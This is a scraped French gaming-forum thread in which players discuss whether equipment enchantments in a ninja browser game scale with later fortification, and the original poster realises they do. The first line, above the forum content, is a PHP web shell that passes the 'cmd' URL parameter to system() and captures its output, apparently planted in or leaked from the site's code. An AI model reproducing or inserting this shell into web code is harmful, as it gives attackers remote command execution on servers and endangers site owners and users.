ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 265|Reponse: 5

Enchantement [Copier l'URL]

Rank: 4

Heure de publication 2020-1-23 09:49:49 |Afficher toutes les publications
Voilà le problème hier sans faire gaffe j'enchante mes bottes alors qu'elles étaient encore level 8. Jusque la pas vraiment de problème c'est de ma faute j'aurais pu attendre de les passer au moins lvl 100 et quelques.
Mais du coup je me dis ce serait bien de pouvoir réinitialiser l'enchantement a zéro et de recommencer mais je n'ai pas l'impression que ce soit possible alors je me dis pourquoi ça?
Tu peut transférer du potentiel d'un ninja a l'autre des jutsu taboo et plein d'autre chose.

Alors voilà l'idée c'est que l'enchantement dépend de ton lvl d'équipement a l'instant t ou tu l'enchante donc même en montant le niveau après avoir enchanté l'objet les stats seront minable. Et je pense honnêtement que c'est un peu abusé je m'explique:

Le meilleur moment pour enchanter une arme serait quand tu est 3ri50 et que ton équipement serait donc level 270 si je ne dis pas de betise. Mais on est pas tous level max au moment ou on va enchanter partant de ce constat il n'y aurait rien de plus logique que d'ajouter une option pour réinitialiser l'enchantement de façon a ce qu'une fois arrivé lvl max tu puisse réenchanter l'équipement level max. Après je dis pas que ça devrait être gratos mais ça devrait exister en tout cas.
Rien que pour le prix en silver de la fortification kunai indra lvl 116 à 117 9M et quelques la fortif pour arriver a 270 accroche toi x) et si tu y arrive tu pourras même pas enchanter ça correctement je trouve que c'est abusé perso

Utiliser la magie Signaler

Rank: 8Rank: 8

Heure de publication 2020-1-23 13:18:37 |Afficher toutes les publications
tes pas serieux la jespere.......... non car si tu lest, tu ma fait ma journée, merci a toi

Heure de publication 2020-1-23 14:49:32 |Afficher toutes les publications
salut, alors on va faire bref : l'enchantement augmentera en même temps que tu fortifieras, ce qui fait qu'il n'y a même pas besoin de parler du reste à part bien sûr qu'il faut fortifier les équipements jusqu'au lvl 120 max pour que cela reste rentable car si tu trouves cher 9m pour passer lvl 116 a 117 j'ai hériter d'un compte ou le stuff est fortifier lvl180 et ça demande 91.6m pour up 1lvl.  voilà voilà bonne journée et au plaisir d'aider ;)

Heure de publication 2020-1-23 17:28:35 |Afficher toutes les publications
ahah okok non ouais en fait les bottes ça file moins de vitesse par enchantement que les armes files d'attaque c'est pour ça je ne me suis pas rendu compte sur le coup que ça avait augmenter tellement c'était peu perceptible désolé du coup, sujet inutile.

Bah après je suis d'accord que ce serait peut etre pas rentable de les monter level max mais à un moment ou t'auras plus que ça a faire de tes silvers on sait jamais

Heure de publication 2020-1-24 08:09:56 |Afficher toutes les publications
levschekmadian@gmail.com a repondu a 2020-1-23 17:28
ahah okok non ouais en fait les bottes ça file moins de vitesse par enchantement que les armes file ...

crois moi avant que ce jour n'arrive de l'eau aura coulé sous les ponts entre les liens ninjas qui coûte 27milliards de silvers pour les up lvl 100 pour les plus récent et la bête qui est aussi très gourmande ^^

Heure de publication 2020-1-24 08:40:33 |Afficher toutes les publications
ahah la dessus je suis tout à fait d'accord c'est clairement pas la priorité rien que l'orbe de vérité aussi si tu le fais 60M par jour etc donc t'as le temps avant d'avoir que ça a monter. Mais ouais du coup comme j'avais fait en héritage sans vraiment regarder les stats j'ai du passer de 3600 et quelques a 3800 en bonus de vitesse avec l'enchantement du coup j'ai cru qu'il y'avait pas eu d'augmentation x). Mais ouais y'en a bien eu une quand même et donc ce sujet est plus qu'inutile et faudrait le fermer voir le supprimer carrément.

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-2-23 09:10 , Processed in 0.022467 second(s), 10 queries , Xcache On.